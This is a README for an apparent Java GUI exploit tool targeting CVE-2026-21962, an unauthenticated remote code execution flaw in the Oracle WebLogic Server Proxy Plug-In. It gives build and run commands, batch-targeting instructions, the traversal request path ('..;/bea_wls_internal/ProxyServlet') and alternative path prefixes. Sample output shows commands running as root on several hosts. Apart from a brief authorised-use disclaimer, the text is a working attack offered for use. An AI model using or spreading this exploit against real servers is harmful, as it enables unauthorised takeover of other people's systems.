
Java GUI tool for exploiting CVE-2026-21962, an unauthenticated RCE in Oracle WebLogic Proxy Plug-In, enabling multi-target command execution via HTTP.
Oracle WebLogic Server Proxy Plug-In RCE (远程代码执行) 漏洞利用工具的 Java GUI 版本。
java-version/
├── pom.xml # Maven 项目配置文件
├── README.md # 项目说明文档
├── run.bat # Windows 启动脚本
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # 程序入口
├── core/
│ └── Exploit.java # 漏洞利用核心逻辑
├── gui/
│ └── MainWindow.java # GUI 主窗口
└── util/
└── HttpClient.java # HTTP 请求工具
程序窗口包含以下区域:
输入参数区域 (顶部)
按钮区域 (中部)
执行日志区域 (下部左侧)
命令输出区域 (下部右侧)
cd java-version
mvn clean compile
mvn clean package
打包后的 JAR 文件位于: target/cve-2026-21962-1.0.0.jar
双击 run.bat 文件即可启动程序
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[依赖jar路径]" com.ashwesker.cve202621962.Main
目标URL:
http://192.168.1.100:7001
执行命令:
whoami
目标URL:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
执行命令:
id
输出结果示例:
[*] 开始测试漏洞...
[*] 目标URL: http://192.168.1.100:7001
[*] 执行命令: id
[*] 测试路径: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] 成功! 状态码: 200
[+] 命令执行成功!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] 开始测试漏洞...
[*] 目标URL: http://192.168.1.101:7001
[*] 执行命令: id
[*] 测试路径: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] 成功! 状态码: 200
[+] 命令执行成功!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
启动程序后,在"目标URL"文本域中输入目标服务器地址
http://target:7001 或 https://oracle-server:4443在"执行命令"字段输入要执行的命令
whoami, id, powershell -c ... 等点击"执行漏洞利用"按钮开始测试
查看下方的"执行日志"了解测试过程
查看下方的"命令输出"获取命令执行结果
在"目标URL"文本域中输入多个目标地址,每行一个
http://target1:7001
http://target2:7001
https://target3:4443
在"执行命令"字段输入要执行的命令
点击"执行漏洞利用"按钮开始批量测试
程序会依次测试每个目标,不同目标的输出结果之间用 ================ (80个等号) 分割
查看下方的"执行日志"了解每个目标的测试过程
查看下方的"命令输出"获取所有目标的命令执行结果
程序会自动测试以下路径:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ 警告: 此工具仅用于授权的安全测试。未经授权使用此工具攻击系统是非法的。
Main.java
Exploit.java
MainWindow.java
HttpClient.java
本项目仅用于教育和安全研究目的。